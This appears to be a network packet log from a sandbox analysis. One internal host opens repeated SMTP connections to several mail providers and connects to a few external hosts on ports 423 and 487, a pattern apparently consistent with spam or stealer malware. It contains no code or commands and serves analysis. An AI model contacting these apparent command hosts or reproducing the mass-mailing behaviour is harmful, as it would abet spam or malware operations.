Sep 5, 2021 15:50:55.904165983 CEST	50170	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:55.904263973 CEST	50171	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:55.904288054 CEST	50170	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:55.904407978 CEST	50175	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:55.904421091 CEST	50170	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:55.904527903 CEST	50170	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:55.904582024 CEST	50170	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:55.911478043 CEST	423	50161	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:55.911629915 CEST	50161	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:55.915359974 CEST	423	50174	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:55.915395975 CEST	25	50176	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:55.915436029 CEST	50174	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:55.915524960 CEST	50176	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:55.927426100 CEST	25	50173	18.185.115.251	192.168.2.4
Sep 5, 2021 15:50:55.931462049 CEST	423	50175	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:55.947438955 CEST	423	50172	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:55.950058937 CEST	50173	25	192.168.2.4	18.185.115.251
Sep 5, 2021 15:50:55.963423014 CEST	25	50171	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:55.971440077 CEST	25	50176	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:55.971470118 CEST	487	50170	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:55.972340107 CEST	487	50170	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:55.972356081 CEST	487	50170	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:55.984999895 CEST	50176	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:55.987385988 CEST	25	50173	18.185.115.251	192.168.2.4
Sep 5, 2021 15:50:55.991324902 CEST	423	50174	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:55.991524935 CEST	50174	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:56.007486105 CEST	487	50170	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:56.007546902 CEST	487	50170	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:56.008445024 CEST	50170	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:56.008558035 CEST	50170	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:56.011287928 CEST	50173	25	192.168.2.4	18.185.115.251
Sep 5, 2021 15:50:56.031357050 CEST	25	50173	18.185.115.251	192.168.2.4
Sep 5, 2021 15:50:56.039036036 CEST	25	50176	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:56.041209936 CEST	25	50176	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:56.066226959 CEST	423	50174	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:56.077030897 CEST	487	50170	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:56.088136911 CEST	50173	25	192.168.2.4	18.185.115.251
Sep 5, 2021 15:50:56.088265896 CEST	50176	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:56.164807081 CEST	50176	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:56.165855885 CEST	50173	25	192.168.2.4	18.185.115.251
Sep 5, 2021 15:50:56.166285992 CEST	50168	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:56.166852951 CEST	50177	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:56.185291052 CEST	25	50173	18.185.115.251	192.168.2.4
Sep 5, 2021 15:50:56.185316086 CEST	25	50173	18.185.115.251	192.168.2.4
Sep 5, 2021 15:50:56.185326099 CEST	25	50173	18.185.115.251	192.168.2.4
Sep 5, 2021 15:50:56.185338974 CEST	25	50173	18.185.115.251	192.168.2.4
Sep 5, 2021 15:50:56.185410023 CEST	50173	25	192.168.2.4	18.185.115.251
Sep 5, 2021 15:50:56.206341982 CEST	25	50173	18.185.115.251	192.168.2.4
Sep 5, 2021 15:50:56.208452940 CEST	423	50177	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:56.208473921 CEST	423	50168	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:56.208585024 CEST	50168	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:56.208587885 CEST	50177	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:56.218522072 CEST	25	50176	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:56.235524893 CEST	50176	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:56.250112057 CEST	423	50177	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:56.250340939 CEST	50177	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:56.291475058 CEST	423	50177	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:56.295388937 CEST	25	50176	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:56.306947947 CEST	50169	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:56.306982994 CEST	50167	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:56.307434082 CEST	50178	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:56.307842970 CEST	50179	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:56.339319944 CEST	25	50171	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:56.339344978 CEST	423	50169	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:56.343254089 CEST	50169	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:56.343283892 CEST	423	50179	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:56.343421936 CEST	50179	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:56.364514112 CEST	50171	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:56.375358105 CEST	423	50167	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:56.375401974 CEST	423	50179	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:56.375579119 CEST	50167	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:56.375658035 CEST	50179	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:56.379880905 CEST	423	50178	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:56.379997015 CEST	50178	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:56.407582998 CEST	423	50179	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:56.418468952 CEST	25	50171	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:56.418526888 CEST	25	50171	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:56.447614908 CEST	50172	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:56.447670937 CEST	50175	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:56.449218988 CEST	50180	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:56.449723005 CEST	50181	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:56.453494072 CEST	423	50178	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:56.453756094 CEST	50178	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:56.454571962 CEST	50171	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:56.473314047 CEST	423	50175	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:56.473391056 CEST	50175	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:56.475366116 CEST	423	50181	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:56.475471973 CEST	50181	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:56.503544092 CEST	423	50181	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:56.503901958 CEST	50181	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:56.508021116 CEST	25	50171	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:56.508070946 CEST	25	50171	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:56.508110046 CEST	25	50171	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:56.508143902 CEST	25	50171	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:56.511058092 CEST	25	50171	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:56.518887043 CEST	423	50180	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:56.519025087 CEST	50180	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:56.519181013 CEST	50174	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:56.519709110 CEST	50182	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:56.521879911 CEST	423	50172	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:56.521970987 CEST	50172	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:56.526956081 CEST	423	50178	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:56.529005051 CEST	423	50181	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:56.587383986 CEST	423	50180	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:56.587631941 CEST	50180	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:56.588280916 CEST	25	50171	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:56.591196060 CEST	50171	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:56.593715906 CEST	423	50174	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:56.593832970 CEST	50174	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:56.601901054 CEST	423	50182	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:56.602026939 CEST	50182	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:56.635044098 CEST	50177	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:56.635565042 CEST	50183	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:56.645910025 CEST	25	50171	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:56.646004915 CEST	50171	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:56.656446934 CEST	423	50180	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:56.676394939 CEST	50184	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:56.676790953 CEST	423	50183	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:56.676886082 CEST	50183	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:56.677028894 CEST	50179	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:56.677191019 CEST	423	50177	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:56.677242994 CEST	50177	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:56.677593946 CEST	50185	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:56.684907913 CEST	423	50182	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:56.685090065 CEST	50182	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:56.709884882 CEST	423	50179	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:56.709956884 CEST	50179	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:56.710184097 CEST	50186	25	192.168.2.4	125.209.238.137
Sep 5, 2021 15:50:56.711235046 CEST	423	50185	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:56.711313963 CEST	50185	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:56.718684912 CEST	423	50183	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:56.718878031 CEST	50183	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:56.744239092 CEST	423	50185	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:56.744601011 CEST	50185	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:56.751281977 CEST	487	50184	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:56.751436949 CEST	50184	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:56.759910107 CEST	423	50183	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:56.767338991 CEST	423	50182	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:56.779109001 CEST	423	50185	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:56.862170935 CEST	487	50184	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:56.862437010 CEST	50184	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:56.931989908 CEST	50178	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:56.932090998 CEST	50181	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:56.932641029 CEST	50187	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:56.933089018 CEST	50188	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:56.936005116 CEST	487	50184	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:56.957499981 CEST	423	50181	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:56.957653999 CEST	50181	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:56.957958937 CEST	423	50188	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:56.958091974 CEST	50188	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:56.977158070 CEST	487	50184	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:56.980977058 CEST	50184	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:56.981064081 CEST	50184	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:56.985542059 CEST	423	50188	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:56.985788107 CEST	50188	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:56.998351097 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:50:56.998481989 CEST	50186	25	192.168.2.4	125.209.238.137
Sep 5, 2021 15:50:57.004425049 CEST	423	50178	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:57.004515886 CEST	50178	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:57.005947113 CEST	423	50187	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:57.006122112 CEST	50187	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:57.010657072 CEST	423	50188	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:57.054666996 CEST	487	50184	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:57.054688931 CEST	487	50184	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:57.055067062 CEST	487	50184	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:57.055313110 CEST	487	50184	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:57.055610895 CEST	487	50184	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:57.079569101 CEST	423	50187	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:57.079837084 CEST	50187	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:57.128772974 CEST	487	50184	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:57.129122972 CEST	50184	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:57.129204035 CEST	50184	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:57.129295111 CEST	50184	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:57.129348993 CEST	50184	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:57.129422903 CEST	50184	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:57.129499912 CEST	50184	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:57.129664898 CEST	50184	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:57.129684925 CEST	50184	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:57.132525921 CEST	25	50176	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:57.152757883 CEST	423	50187	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:57.157943010 CEST	50176	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:57.166388988 CEST	50180	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:57.166891098 CEST	50189	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:57.202821970 CEST	487	50184	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:57.202899933 CEST	487	50184	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:57.203222990 CEST	487	50184	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:57.203396082 CEST	487	50184	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:57.203887939 CEST	487	50184	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:57.204070091 CEST	487	50184	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:57.204248905 CEST	487	50184	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:57.204411030 CEST	487	50184	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:57.211004972 CEST	25	50176	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:57.211422920 CEST	25	50176	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:57.234606981 CEST	423	50180	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:57.234731913 CEST	50180	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:57.236637115 CEST	423	50189	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:57.236726999 CEST	50189	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:57.239670038 CEST	50176	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:57.278650999 CEST	487	50184	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:57.278793097 CEST	487	50184	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:57.278862953 CEST	50184	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:57.279040098 CEST	50184	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:57.292824984 CEST	25	50176	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:57.292937040 CEST	25	50176	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:57.292965889 CEST	25	50176	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:57.292992115 CEST	25	50176	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:57.293118954 CEST	25	50176	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:57.296793938 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:50:57.306660891 CEST	423	50189	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:57.352462053 CEST	487	50184	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:57.440288067 CEST	25	50176	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:57.440310955 CEST	25	50176	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:57.440445900 CEST	50176	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:57.447405100 CEST	50189	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:57.462354898 CEST	50182	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:57.462469101 CEST	50183	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:57.462727070 CEST	50185	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:57.478908062 CEST	50186	25	192.168.2.4	125.209.238.137
Sep 5, 2021 15:50:57.485397100 CEST	50190	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:57.486475945 CEST	50191	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:57.487380981 CEST	50192	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:57.495405912 CEST	423	50185	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:57.495474100 CEST	50185	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:57.503460884 CEST	423	50183	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:57.503571033 CEST	50183	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:57.514036894 CEST	50186	25	192.168.2.4	125.209.238.137
Sep 5, 2021 15:50:57.517204046 CEST	423	50189	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:57.519012928 CEST	423	50192	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:57.519186020 CEST	50192	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:57.526843071 CEST	423	50191	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:57.526933908 CEST	50191	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:57.544342995 CEST	423	50182	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:57.544456959 CEST	50182	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:57.551172018 CEST	423	50192	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:57.560806990 CEST	423	50190	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:57.560962915 CEST	50190	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:57.567481041 CEST	423	50191	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:57.636625051 CEST	423	50190	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:57.674077034 CEST	50176	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:57.674413919 CEST	50192	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:57.675050020 CEST	50190	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:57.678504944 CEST	50191	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:57.678606987 CEST	50193	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:57.678735018 CEST	50188	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:57.682499886 CEST	50194	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:57.703856945 CEST	423	50188	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:57.703984022 CEST	50188	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:57.706185102 CEST	423	50192	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:57.707798958 CEST	423	50194	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:57.707895041 CEST	50194	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:57.718956947 CEST	423	50191	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:57.727233887 CEST	25	50176	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:57.734280109 CEST	423	50194	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:57.743884087 CEST	50194	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:57.750298977 CEST	423	50190	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:57.750415087 CEST	487	50193	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:57.750576019 CEST	50193	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:57.769361973 CEST	423	50194	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:57.789566040 CEST	25	50173	18.185.115.251	192.168.2.4
Sep 5, 2021 15:50:57.791975975 CEST	50187	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:57.799921036 CEST	50195	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:57.809290886 CEST	50173	25	192.168.2.4	18.185.115.251
Sep 5, 2021 15:50:57.811228037 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:50:57.811309099 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:50:57.819585085 CEST	50186	25	192.168.2.4	125.209.238.137
Sep 5, 2021 15:50:57.820447922 CEST	50197	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:57.828749895 CEST	25	50173	18.185.115.251	192.168.2.4
Sep 5, 2021 15:50:57.829004049 CEST	50173	25	192.168.2.4	18.185.115.251
Sep 5, 2021 15:50:57.870980024 CEST	423	50195	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:57.871136904 CEST	50195	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:57.882409096 CEST	423	50187	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:57.882540941 CEST	50187	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:57.887326956 CEST	25	50173	18.185.115.251	192.168.2.4
Sep 5, 2021 15:50:57.887777090 CEST	487	50193	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:57.888138056 CEST	50193	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:57.924789906 CEST	50198	25	192.168.2.4	77.75.76.42
Sep 5, 2021 15:50:57.943309069 CEST	423	50195	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:57.943604946 CEST	50195	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:57.950443983 CEST	25	50198	77.75.76.42	192.168.2.4
Sep 5, 2021 15:50:57.950556993 CEST	50198	25	192.168.2.4	77.75.76.42
Sep 5, 2021 15:50:57.957268953 CEST	25	50173	18.185.115.251	192.168.2.4
Sep 5, 2021 15:50:57.957325935 CEST	50173	25	192.168.2.4	18.185.115.251
Sep 5, 2021 15:50:57.960148096 CEST	487	50193	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:57.977240086 CEST	487	50193	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:57.981024981 CEST	50193	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:57.981100082 CEST	50193	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:57.982748985 CEST	25	50197	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:57.982861042 CEST	50197	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:58.014574051 CEST	423	50195	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:58.053507090 CEST	487	50193	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:58.053950071 CEST	487	50193	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:58.087558031 CEST	487	50193	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:58.087827921 CEST	50193	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:58.087893009 CEST	50193	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:58.088121891 CEST	50193	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:58.088229895 CEST	50193	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:58.088243008 CEST	50193	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:58.088251114 CEST	50193	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:58.088255882 CEST	50193	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:58.088344097 CEST	50193	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:58.120049000 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:50:58.137548923 CEST	50186	25	192.168.2.4	125.209.238.137
Sep 5, 2021 15:50:58.145684004 CEST	25	50197	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:58.158663988 CEST	50197	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:58.161117077 CEST	487	50193	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:58.161535025 CEST	487	50193	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:58.161951065 CEST	487	50193	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:58.162761927 CEST	487	50193	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:58.166491032 CEST	50189	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:58.167040110 CEST	50199	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:58.188235998 CEST	487	50193	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:58.219491005 CEST	487	50193	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:58.219656944 CEST	50193	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:58.219904900 CEST	50193	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:58.236764908 CEST	423	50189	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:58.236943960 CEST	50189	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:58.237597942 CEST	423	50199	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:58.237705946 CEST	50199	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:58.291626930 CEST	487	50193	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:58.307684898 CEST	423	50199	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:58.321762085 CEST	25	50197	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:58.321782112 CEST	25	50197	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:58.392043114 CEST	50197	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:58.392246008 CEST	50199	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:58.443268061 CEST	25	50186	125.209.238.137	192.168.2.4
Sep 5, 2021 15:50:58.462951899 CEST	423	50199	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:58.474394083 CEST	50186	25	192.168.2.4	125.209.238.137
Sep 5, 2021 15:50:58.510310888 CEST	50191	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:58.510313988 CEST	50190	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:58.510386944 CEST	50194	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:58.510390043 CEST	50192	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:58.511176109 CEST	50200	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:58.511795044 CEST	50201	423	192.168.2.4	95.216.195.92
